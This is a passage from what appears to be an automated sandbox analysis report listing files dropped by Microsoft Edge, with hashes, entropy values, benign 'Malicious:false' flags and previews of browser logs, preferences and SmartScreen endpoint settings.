                                                                                                                                                                                                                                                                                                                            SHA1:DA500B30D167353262190F10A4AC006B3B3115B6
                                                                                                                                                                                                                                                                                                                            SHA-256:D17A6AA17F1A1A067842427D74BED043C3FB974623AF5ABDBF75F646BC89F5AA
                                                                                                                                                                                                                                                                                                                            SHA-512:7173BE71B5330BE6ABAC6EFDD8348ADA77E9AF9C100B3B4EA8877772AB2D3C84BEC7F497B265A726A5C327AFF85D5D3BFE824256829FB79E4D06327419D7B2C7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):554
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):2.927488883401678
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:/XntM+Bcil3sedhO7yOuuuuuuuuuuuuuuuuuuuuuu:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuu
                                                                                                                                                                                                                                                                                                                            MD5:576E928A58B29421D5CDC9D1D2D40DD5
                                                                                                                                                                                                                                                                                                                            SHA1:AA4668F1E3AC8E70BD1DEDBEB8F664194791769D
                                                                                                                                                                                                                                                                                                                            SHA-256:991318A24B1CC5AE91B0FCE3378C9583C061AF30A07D8C4E5CA54985F73900B6
                                                                                                                                                                                                                                                                                                                            SHA-512:89F9E87915FD8BF3C0DB5E37F977DA059638AAC69AC0E75569BA85023249D9F9560EE892974AD62B3A95AD8998CD94CF103C0B3894B9CD789F8EC454D394BC13
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.179511226208206
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHSyq2PN723oH+TcwtfrK+IFUtt91ZmwDrRkwON723oH+TcwtfrUeLJ:7yyvVaYeb23FUtd/3R5OaYeb3J
                                                                                                                                                                                                                                                                                                                            MD5:5B943255F6148167900D701E52DEDDD5
                                                                                                                                                                                                                                                                                                                            SHA1:9AA041588C7004507544D32319E8C2D7372ACAC4
                                                                                                                                                                                                                                                                                                                            SHA-256:46D573DA6FA0A8AC69891733A85423BECBDE2871344AD6D3C1F9EDD95367EE9D
                                                                                                                                                                                                                                                                                                                            SHA-512:163B6DC5197AFA75FF46101C19D4A5C864B92B912C03F80F869CBA4225574ACD2951DE3E534AFA797845BBAD9EE0BBF123C0278149F27D79028235D0C7A609FD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.041 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/05-02:39:16.042 1e34 Recovering log #3.2025/01/05-02:39:16.042 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.179511226208206
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHSyq2PN723oH+TcwtfrK+IFUtt91ZmwDrRkwON723oH+TcwtfrUeLJ:7yyvVaYeb23FUtd/3R5OaYeb3J
                                                                                                                                                                                                                                                                                                                            MD5:5B943255F6148167900D701E52DEDDD5
                                                                                                                                                                                                                                                                                                                            SHA1:9AA041588C7004507544D32319E8C2D7372ACAC4
                                                                                                                                                                                                                                                                                                                            SHA-256:46D573DA6FA0A8AC69891733A85423BECBDE2871344AD6D3C1F9EDD95367EE9D
                                                                                                                                                                                                                                                                                                                            SHA-512:163B6DC5197AFA75FF46101C19D4A5C864B92B912C03F80F869CBA4225574ACD2951DE3E534AFA797845BBAD9EE0BBF123C0278149F27D79028235D0C7A609FD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.041 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/05-02:39:16.042 1e34 Recovering log #3.2025/01/05-02:39:16.042 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):928
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.0841566368719775
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sx3O5v:LYUtyp5q55NvIp8Sx3O5v
                                                                                                                                                                                                                                                                                                                            MD5:FFD773A32B54CE20C08561046A7359C3
                                                                                                                                                                                                                                                                                                                            SHA1:0457B60240313DE71285F57D99A505601FECA7EF
                                                                                                                                                                                                                                                                                                                            SHA-256:F0FF72019973430411A49A1B5BB5F2C3FBEAA8EAB418944ACB3295CB00DBBA50
                                                                                                                                                                                                                                                                                                                            SHA-512:D8EC47D415459BB850BF7973E9C7583E1A4F16B48216D185EC9CCE7739A641F79E5335B0286E428B51BB761B99C043A5D398D7C51274FC2E4A3BAF742D1EAF98
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.205464656495783
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfoSQupyq2PN723oH+TcwtfrzAdIFUttfoSWz1ZmwDfoSWlRkwON723oH+Tcwc:7/oSxpyvVaYeb9FUt9oSWZ/zoSWlR5Or
                                                                                                                                                                                                                                                                                                                            MD5:D17EA77F9BEC0018A888CCDE36C3A1A4
                                                                                                                                                                                                                                                                                                                            SHA1:B30D1C8EF9D487FD32B91D3859F37E871C113C85
                                                                                                                                                                                                                                                                                                                            SHA-256:7D110E580750CB39FA641FDE97A407367B70B1CD297969866AD53443ED660FB2
                                                                                                                                                                                                                                                                                                                            SHA-512:FB5455053A28367A2451D0CF6667B1E16203C2EAEC14719252A44E4AE149B09DF7F478E8EF4D054299293262505D84BF79833D0C90829183BA9C84F5B5B15177
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.975 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/05-02:39:15.976 1e34 Recovering log #3.2025/01/05-02:39:15.976 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.205464656495783
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfoSQupyq2PN723oH+TcwtfrzAdIFUttfoSWz1ZmwDfoSWlRkwON723oH+Tcwc:7/oSxpyvVaYeb9FUt9oSWZ/zoSWlR5Or
                                                                                                                                                                                                                                                                                                                            MD5:D17EA77F9BEC0018A888CCDE36C3A1A4
                                                                                                                                                                                                                                                                                                                            SHA1:B30D1C8EF9D487FD32B91D3859F37E871C113C85
                                                                                                                                                                                                                                                                                                                            SHA-256:7D110E580750CB39FA641FDE97A407367B70B1CD297969866AD53443ED660FB2
                                                                                                                                                                                                                                                                                                                            SHA-512:FB5455053A28367A2451D0CF6667B1E16203C2EAEC14719252A44E4AE149B09DF7F478E8EF4D054299293262505D84BF79833D0C90829183BA9C84F5B5B15177
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.975 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/05-02:39:15.976 1e34 Recovering log #3.2025/01/05-02:39:15.976 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEjXyKl/:/M/xT02zsZt
                                                                                                                                                                                                                                                                                                                            MD5:B2F2F1733175EA2EE03BFBBB97ED86C9
                                                                                                                                                                                                                                                                                                                            SHA1:6CE61DE848264AD7849BB5A2B1E7B9870DE0A59F
                                                                                                                                                                                                                                                                                                                            SHA-256:4660D25B10A638EDCBF5FA76A7829162A2C103503FA7BB3B3E627420F0C38D05
                                                                                                                                                                                                                                                                                                                            SHA-512:A22F8444AD432480F57E6C88A85AC3E6A39E25283F7EC30B34680A2D4BE1ED1A7838D449FE78188112E8B319C615F11DC32E470E820379AB91C0B49A22AE70B7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEjYN/:/M/xT02zH
                                                                                                                                                                                                                                                                                                                            MD5:51868FD5FBCEA77322FB69C8F5F4D643
                                                                                                                                                                                                                                                                                                                            SHA1:F21F01847973F20AC50D20731DDA91832EEB3005
                                                                                                                                                                                                                                                                                                                            SHA-256:54B2FD7ACFCE814D6EF8A0B8249925C4618FE69AE0308A08663C4EC9036B8A8A
                                                                                                                                                                                                                                                                                                                            SHA-512:53CA83AD6AC9200496937C879AFC57202F2E1F4F1FCBD17F5BA01CA2F20C51997478F6BB9197F0BDCBF74333780556201DAC45F5EF252458C8CDC961F8160A42
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                                            MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                                            SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                                            SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                                            SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:117.0.2045.55
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.0897618280562025
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWFdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn76kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                                            MD5:5F854A8D2611A5343EE1A76398D58238
                                                                                                                                                                                                                                                                                                                            SHA1:050716CB313162D10F7E547CE9888384ABB0F29C
                                                                                                                                                                                                                                                                                                                            SHA-256:CD836B130214BF743841EAC81527E95EEC1208B322222E9985E267D3096ADD0A
                                                                                                                                                                                                                                                                                                                            SHA-512:21E713F95983C6CC2444EB33D6A165463E9BF3DFC8965A46E5215BB734C4136A6A1C59B97DF5383D4ADA31B67400FBE538BFB25E2C6F4B26A6B8A9C12027C248
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.5898156356912286
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLyeuAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isXuymds6BbrdFLt4l0r:TLyXOUOq0afDdWec9sJwziZ4Z7J5fc
                                                                                                                                                                                                                                                                                                                            MD5:DEE6B30FA987F315C47F9F5D037DA482
                                                                                                                                                                                                                                                                                                                            SHA1:3B439394FDBEE3E6322867EC8A77E6616C907D49
                                                                                                                                                                                                                                                                                                                            SHA-256:9EECB1D073647DBAC1040EA9743357EE284CAFFD01E68BA2CFCEF4705CD30F98
                                                                                                                                                                                                                                                                                                                            SHA-512:3697E9D5311E479E13AC5D5C51820BAA6B823E8F90C7FE7AB41E667BE462D712E21CAFD7BAD9B99CC3E78560F1920C2CB4E87AAFD791168DFD27355D04E56D5C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEjrrXF:/M/xT02zaXF
                                                                                                                                                                                                                                                                                                                            MD5:5193C55BE2D3F5497D7596B39377876D
                                                                                                                                                                                                                                                                                                                            SHA1:0A25106CA005623F6E005DEF4567BDC870844F01
                                                                                                                                                                                                                                                                                                                            SHA-256:415D4415888438A6C56F72A4C195BE3D1C61695CAC5B9416495A653A21FDC1A4
                                                                                                                                                                                                                                                                                                                            SHA-512:3962E77786E0712C5DB741442FB24402479FE4AE5E6F63F1A9B0D9A764394E9570CF3338F95DF680E0ED1D289AAE7D7BD6FB67430E2116070E4211B532037E84
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):47
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                            MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                            SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                            SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                            SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):35
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                            MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                            SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                            SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                            SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                            MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                            SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                            SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                            SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):130439
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                            MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                            SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                            SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                            SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
